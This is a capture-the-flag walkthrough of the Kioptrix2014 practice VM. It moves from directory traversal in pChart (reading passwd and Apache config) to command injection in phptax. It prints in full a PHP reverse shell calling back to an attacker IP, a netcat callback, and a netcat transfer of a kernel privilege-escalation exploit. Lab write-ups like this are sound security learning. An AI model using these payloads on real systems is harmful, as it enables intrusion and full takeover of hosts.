Kioptrix2014- Walkthrough
I started this box with a netdiscover
nmap scan found some ports
I browsed to port 80 to find
Checking the page source gives us our next clue
Let’s browse to “pChart2.1.3…”
I then looked up exploits associated with pchart
In the first link, I followed the directory traversal vuln instructions
And received a output of the passwd file!
I wanted to access more config files on the system. So I googled “freebsd default apache directory” and found the following site:
It goes on to say that the default dir is /usr/local/etc/apache2x/httpd.conf where x is the apache version (Apache 2.2 in our case). I added apache22 and browsed to the url to find:
After browsing through the file, it looks like our next target is the webserver on port 8080. Looks like we need to specify the user agent string to get access though
Mozilla/4.0 Mozilla4_browser
I used a tool called “User Agent Switcher” to change my user agent string. I had to create a new entry with the info above. I selected the profile and browsed to the site
We are presented with a directory
Phptax presents us with:
The source file revealed the program name, but not much else
I looked up “phptax exploit” in google and found a related RCE exploit
I had to submit an http request for a nc bind port, I changed the request around to connect back to my user
I tried http://192.168.0.135:8080/phptax/index.php?pfilez=1040d1-pg2.tob;nc%20192.168.0.129%201234;&pdf=make
And I would get a response back, but it would terminate immediately..
The command was executing, but there had to be another way we could use this. Let’s try creating a file
http://192.168.0.135:8080/phptax/index.php?pfilez=1040d1-pg2.tob;enetercodehere;&pdf=make
Let’s verify we can create files with : echo “” > a.php;&pdf=make
Put the command in https://meyerweb.com/eric/tools/dencoder/ to encode it, then submit the request in the browser
And entering it in the browser:
Now let’s go to http://192.168.0.135:8080/phpinfo/info.php to reveal
Ok, let’s write a php shell and browse to it to generate a shell!
I encoded the following command to generate a php file called shell.php:
echo “<“!–?php set_time_limit (0); \$VERSION = \”1.0\”; \$ip = \”192.168.0.129\”; \$port = 1234; \$chunk_size = 1400; \$write_a = null; \$error_a = null; \$shell = \”uname -a; w; id; /bin/sh -i\”; \$daemon = 0; \$debug = 0; if (function_exists(\”pcntl_fork\”)) { \$pid = pcntl_fork(); if (\$pid == -1) { printit(\”ERROR: Cant fork\”); exit(1); } if (\$pid) { exit(0); } if (posix_setsid() == -1) { printit(\”Error: Cant setsid()\”); exit(1); } \$daemon = 1; } else { printit(\”WARNING: Failed to daemonise. This is quite common and not fatal.\”); } chdir(\”/\”); umask(0); \$sock = fsockopen(\$ip, \$port, \$errno, \$errstr, 30); if (!\$sock) { printit(\”\$errstr (\$errno)\”); exit(1); } \$descriptorspec = array( 0 => array(\”pipe\”, \”r\”), 1 => array(\”pipe\”, \”w\”), 2 => array(\”pipe\”, \”w\”) ); \$process = proc_open(\$shell, \$descriptorspec, \$pipes); if (!is_resource(\$process)) { printit(\”ERROR: Cant spawn shell\”); exit(1); } stream_set_blocking(\$pipes[0], 0); stream_set_blocking(\$pipes[1], 0); stream_set_blocking(\$pipes[2], 0); stream_set_blocking(\$sock, 0); printit(\”Successfully opened reverse shell to \$ip:\$port\”); while (1) { if (feof(\$sock)) { printit(\”ERROR: Shell connection terminated\”); break; } if (feof(\$pipes[1])) { printit(\”ERROR: Shell process terminated\”); break; } \$read_a = array(\$sock, \$pipes[1], \$pipes[2]); \$num_changed_sockets = stream_select(\$read_a, \$write_a, \$error_a, null); if (in_array(\$sock, \$read_a)) { if (\$debug) printit(\”SOCK READ\”); \$input = fread(\$sock, \$chunk_size); if (\$debug) printit(\”SOCK: \$input\”); fwrite(\$pipes[0], \$input); } if (in_array(\$pipes[1], \$read_a)) { if (\$debug) printit(\”STDOUT READ\”); \$input = fread(\$pipes[1], \$chunk_size); if (\$debug) printit(\”STDOUT: \$input\”); fwrite(\$sock, \$input); } if (in_array(\$pipes[2], \$read_a)) { if (\$debug) printit(\”STDERR READ\”); \$input = fread(\$pipes[2], \$chunk_size); if (\$debug) printit(\”STDERR: \$input\”); fwrite(\$sock, \$input); } } fclose(\$sock); fclose(\$pipes[0]); fclose(\$pipes[1]); fclose(\$pipes[2]); proc_close(\$process); function printit (\$string) { if (!\$daemon) { print \”\$string\n\”; } } ?–“>” > shell.php
The final command in the browser was:
And we received a shell!
Let’s see what the OS and kernel is, then check for exploits
Searched in google
And tried the first one. I downloaded the exploit, and transferred it to the vuln vm with netcat
From my kali box
And on the vuln vm
I ran gcc on the file, chmod’d it and execute to grab a root shell!
I found a congrats.txt file in the root directory
It mentions that OSSEC is installed, and it’s been logging alerts. I thought that was an awesome idea, so I checked out the log
The first thing I saw was the privilege escalation exploit
Then I saw my php reverse shell upload attempts
Then finally my directory traversal attack
And thanks to the author for this 🙂
Awesome VM, great idea to install ossec